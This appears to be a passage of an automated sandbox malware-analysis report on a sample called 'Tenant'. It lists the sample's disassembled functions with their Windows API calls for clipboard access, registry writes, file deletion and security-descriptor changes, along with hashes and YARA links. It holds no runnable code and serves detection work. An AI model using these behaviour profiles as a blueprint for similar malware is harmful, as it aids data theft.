                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: 678a0f8afd26710647ad45220415b012239f00e42510693264691fd4782447b8
                                                                                        • Instruction ID: 91d14ba3923b924a4aa4d6f0927f8bcd3355b1f129c7b566b7508860cd666365
                                                                                        • Opcode Fuzzy Hash: 678a0f8afd26710647ad45220415b012239f00e42510693264691fd4782447b8
                                                                                        • Instruction Fuzzy Hash: 118137B190020DBFDF11AFA4DE49AFFBB79AF04304F144269FA14A7261DB318E159B64
                                                                                        Function 00B14632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(00B30980), ref: 00B1465C
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B1466A
                                                                                        • GetClipboardData.USER32(0000000D), ref: 00B14672
                                                                                        • CloseClipboard.USER32 ref: 00B1467E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B1469A
                                                                                        • CloseClipboard.USER32 ref: 00B146A4
                                                                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B146B9
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00B146C6
                                                                                        • GetClipboardData.USER32(00000001), ref: 00B146CE
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B146DB
                                                                                        • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00B1470F
                                                                                        • CloseClipboard.USER32 ref: 00B1481F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                        • String ID:
                                                                                        • API String ID: 3222323430-0
                                                                                        • Opcode ID: fe158cd8952743bea2505cf2901c1bb5efe35c254e4b1c507018ffb110246b8c
                                                                                        • Instruction ID: d7cbc5c3359e79c5e5eea99137edffc3b61429b2176b76d763ba71fa297a30d3
                                                                                        • Opcode Fuzzy Hash: fe158cd8952743bea2505cf2901c1bb5efe35c254e4b1c507018ffb110246b8c
                                                                                        • Instruction Fuzzy Hash: 00519B31204201AFD300FB64EDAAFAE77A8AF95B11F500569F646931E2DF7099448B62
                                                                                        Function 00B0CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B0CDD0
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0CE24
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0CE49
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0CE60
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B0CE87
                                                                                        • __swprintf.LIBCMT ref: 00B0CED3
                                                                                        • __swprintf.LIBCMT ref: 00B0CF16
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • __swprintf.LIBCMT ref: 00B0CF6A
                                                                                          • Part of subcall function 00AC38C8: __woutput_l.LIBCMT ref: 00AC3921
                                                                                        • __swprintf.LIBCMT ref: 00B0CFB8
                                                                                          • Part of subcall function 00AC38C8: __flsbuf.LIBCMT ref: 00AC3943
                                                                                          • Part of subcall function 00AC38C8: __flsbuf.LIBCMT ref: 00AC395B
                                                                                        • __swprintf.LIBCMT ref: 00B0D007
                                                                                        • __swprintf.LIBCMT ref: 00B0D056
                                                                                        • __swprintf.LIBCMT ref: 00B0D0A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 3953360268-2428617273
                                                                                        • Opcode ID: 705b8ce51c0fe4cd1e7498a228f2573309a5d0703e327ca6b824a43d4e6eb203
                                                                                        • Instruction ID: 51b4627de945b88cfab4ff3c42e269e87e637f6abb4d16bfc55b1a54678e9b57
                                                                                        • Opcode Fuzzy Hash: 705b8ce51c0fe4cd1e7498a228f2573309a5d0703e327ca6b824a43d4e6eb203
                                                                                        • Instruction Fuzzy Hash: BBA120B2404305ABC710EFA4DA95DAFB7ECEF99704F40491DF58587192EB70EA09CB62
                                                                                        Function 00B0F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B0F5F9
                                                                                        • _wcscmp.LIBCMT ref: 00B0F60E
                                                                                        • _wcscmp.LIBCMT ref: 00B0F625
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00B0F637
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00B0F651
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B0F669
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F674
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F690
                                                                                        • _wcscmp.LIBCMT ref: 00B0F6B7
                                                                                        • _wcscmp.LIBCMT ref: 00B0F6CE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F6E0
                                                                                        • SetCurrentDirectoryW.KERNEL32(00B5B578), ref: 00B0F6FE
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F708
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F715
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F727
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: 850923526fa91e8be6048988c3dbb0aea6c1dd4644a658b6edf43b5bb474db97
                                                                                        • Instruction ID: a1ac70594e972e7dd7fdeeb4961e6716563600701d338a8588f7ec0f594993ea
                                                                                        • Opcode Fuzzy Hash: 850923526fa91e8be6048988c3dbb0aea6c1dd4644a658b6edf43b5bb474db97
                                                                                        • Instruction Fuzzy Hash: 3C31647164121AABDB24EEA4AC59AEE77ECEF09321F1041E5E804D31E0DB70DE44CA60
                                                                                        Function 00B20EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20FB3
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B30980,00000000,?,00000000,?,?), ref: 00B21021
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B21069
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B210F2
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B21412
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B2141F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: 4965043d87e18ae20d0a6b4bfba29267991b6d8970d55003a97e0f6c228e3dbe
                                                                                        • Instruction ID: c4a52c1224d3ebf0d6af22dde877dad65d8dd7a521801bfe62f37c2b819e28b2
                                                                                        • Opcode Fuzzy Hash: 4965043d87e18ae20d0a6b4bfba29267991b6d8970d55003a97e0f6c228e3dbe
                                                                                        • Instruction Fuzzy Hash: C3027C752006119FCB14EF28D991E2AB7E5FF89714F04899DF9999B3A2CB70EC01CB91
                                                                                        Function 00B0F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B0F756
                                                                                        • _wcscmp.LIBCMT ref: 00B0F76B
                                                                                        • _wcscmp.LIBCMT ref: 00B0F782
                                                                                          • Part of subcall function 00B04875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B04890
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B0F7B1
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F7BC
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F7D8
                                                                                        • _wcscmp.LIBCMT ref: 00B0F7FF
                                                                                        • _wcscmp.LIBCMT ref: 00B0F816
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F828
                                                                                        • SetCurrentDirectoryW.KERNEL32(00B5B578), ref: 00B0F846
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F850
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F85D
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0F86F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: 51f1f07dd2bf2dc8de95d8a9985da6ad32e1647d4c5faa6e52f0071453397744
                                                                                        • Instruction ID: 9a0e992cfc0b24f0177bded1a524dd64d365ecc70b1e0617350a154d6860a22b
                                                                                        • Opcode Fuzzy Hash: 51f1f07dd2bf2dc8de95d8a9985da6ad32e1647d4c5faa6e52f0071453397744
                                                                                        • Instruction Fuzzy Hash: 1A31867260031AABDB24AAB49C58AFE7BECDF49321F1441E5E814A35E0DB70DE458A50
                                                                                        Function 00AF88CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8E3C
                                                                                          • Part of subcall function 00AF8E20: GetLastError.KERNEL32(?,00AF8900,?,?,?), ref: 00AF8E46
                                                                                          • Part of subcall function 00AF8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AF8900,?,?,?), ref: 00AF8E55
                                                                                          • Part of subcall function 00AF8E20: HeapAlloc.KERNEL32(00000000,?,00AF8900,?,?,?), ref: 00AF8E5C
                                                                                          • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8E73
                                                                                          • Part of subcall function 00AF8EBD: GetProcessHeap.KERNEL32(00000008,00AF8916,00000000,00000000,?,00AF8916,?), ref: 00AF8EC9
                                                                                          • Part of subcall function 00AF8EBD: HeapAlloc.KERNEL32(00000000,?,00AF8916,?), ref: 00AF8ED0
                                                                                          • Part of subcall function 00AF8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF8916,?), ref: 00AF8EE1
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF8931
                                                                                        • _memset.LIBCMT ref: 00AF8946
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF8965
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00AF8976
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00AF89B3
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF89CF
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00AF89EC
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF89FB
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00AF8A02
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF8A23
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00AF8A2A
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF8A5B
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF8A81
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF8A95
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: a9dd33ee31f23583f1324a0ab03aafeb2a20541ea7ed0a33ef61cc3eafec66aa
                                                                                        • Instruction ID: 0a7ac1fc30d7a86cee2144b2f47b939295ccde5e169c744a28a28d2e7e3554d3
                                                                                        • Opcode Fuzzy Hash: a9dd33ee31f23583f1324a0ab03aafeb2a20541ea7ed0a33ef61cc3eafec66aa
                                                                                        • Instruction Fuzzy Hash: 7D61347590020DEFDF05AFA1DC95ABEBB79FF04304F14812AFA15A7290DB399A04CB60
                                                                                        Function 00B20A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20B0C
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B20BAB
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B20C43
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B20E82
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B20E8F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        • Opcode ID: df09e00ce4063693a0995d10aa7850ff2603122392999b291c0e223ee8828d47
                                                                                        • Instruction ID: 528e920b0fbb151e174f6d157fdbc545053879a80c847315e99f8b89c041156c
                                                                                        • Opcode Fuzzy Hash: df09e00ce4063693a0995d10aa7850ff2603122392999b291c0e223ee8828d47
                                                                                        • Instruction Fuzzy Hash: 01E15E71614214AFC714EF24D995E6EBBE8EF89714F0489ADF449DB2A2DB30EC01CB51
                                                                                        Function 00B0443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00B04451
                                                                                        • __swprintf.LIBCMT ref: 00B0445E
                                                                                          • Part of subcall function 00AC38C8: __woutput_l.LIBCMT ref: 00AC3921
                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B04488
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00B04494
                                                                                        • LockResource.KERNEL32(00000000), ref: 00B044A1
                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00B044C1
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00B044D3
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00B044E2
                                                                                        • LockResource.KERNEL32(?), ref: 00B044EE
                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B0454F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                        • String ID:
                                                                                        • API String ID: 1433390588-0
                                                                                        • Opcode ID: 7df0588e01715922bbbfdccddb08518d897a9075e14218d027911d1264b88459
                                                                                        • Instruction ID: 7c52a6f2e1529adcb7961c5d1163ed65482cfd88da8bc0b2b231d793d3d15dc9
                                                                                        • Opcode Fuzzy Hash: 7df0588e01715922bbbfdccddb08518d897a9075e14218d027911d1264b88459
                                                                                        • Instruction Fuzzy Hash: B5318DB150121AABDB11AF60AD98EBF7BE8FF14301F108495FA1293190DB74DA10CBA0
                                                                                        Function 00B14830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: 87b93e9186a6d5bb7ffe999f9c5ffd607c6ca776cfdd3c91a0e3f4e8c82c58a2
                                                                                        • Instruction ID: 3ce5587617d67ffb975a57b281283de18f30908afcde3abc927ce31552491586
                                                                                        • Opcode Fuzzy Hash: 87b93e9186a6d5bb7ffe999f9c5ffd607c6ca776cfdd3c91a0e3f4e8c82c58a2
                                                                                        • Instruction Fuzzy Hash: 1521C4312152109FDB01AF64ED6AF6E77E8EF85B21F108059F9069B2A1CF70AD40CB94
                                                                                        Function 00B03CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB2A58,?,00008000), ref: 00AC02A4
                                                                                          • Part of subcall function 00B04FEC: GetFileAttributesW.KERNEL32(?,00B03BFE), ref: 00B04FED
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B03D96
                                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B03E3E
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B03E51
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B03E6E
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B03E90
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B03EAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 4002782344-1173974218
                                                                                        • Opcode ID: 35c0641d952f1cc1ab0af930495d59763fde168ab2d4386fa56e57cba7ef1c27
                                                                                        • Instruction ID: 6f6389862456424cff8f592d66c7d336e2505e83ef4e5a7435d374767e564dfa
                                                                                        • Opcode Fuzzy Hash: 35c0641d952f1cc1ab0af930495d59763fde168ab2d4386fa56e57cba7ef1c27
                                                                                        • Instruction Fuzzy Hash: 4851347180114D9ACF15EBA0CAA6DEEBBFDAF11301F6042A5E445B7192EF316F09CB60
                                                                                        Function 00B0FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B0FA83
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0FB96
                                                                                          • Part of subcall function 00AA52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AA52E6
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00B0FAB3
                                                                                        • _wcscmp.LIBCMT ref: 00B0FAC7
                                                                                        • _wcscmp.LIBCMT ref: 00B0FAE2
                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 00B0FB80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
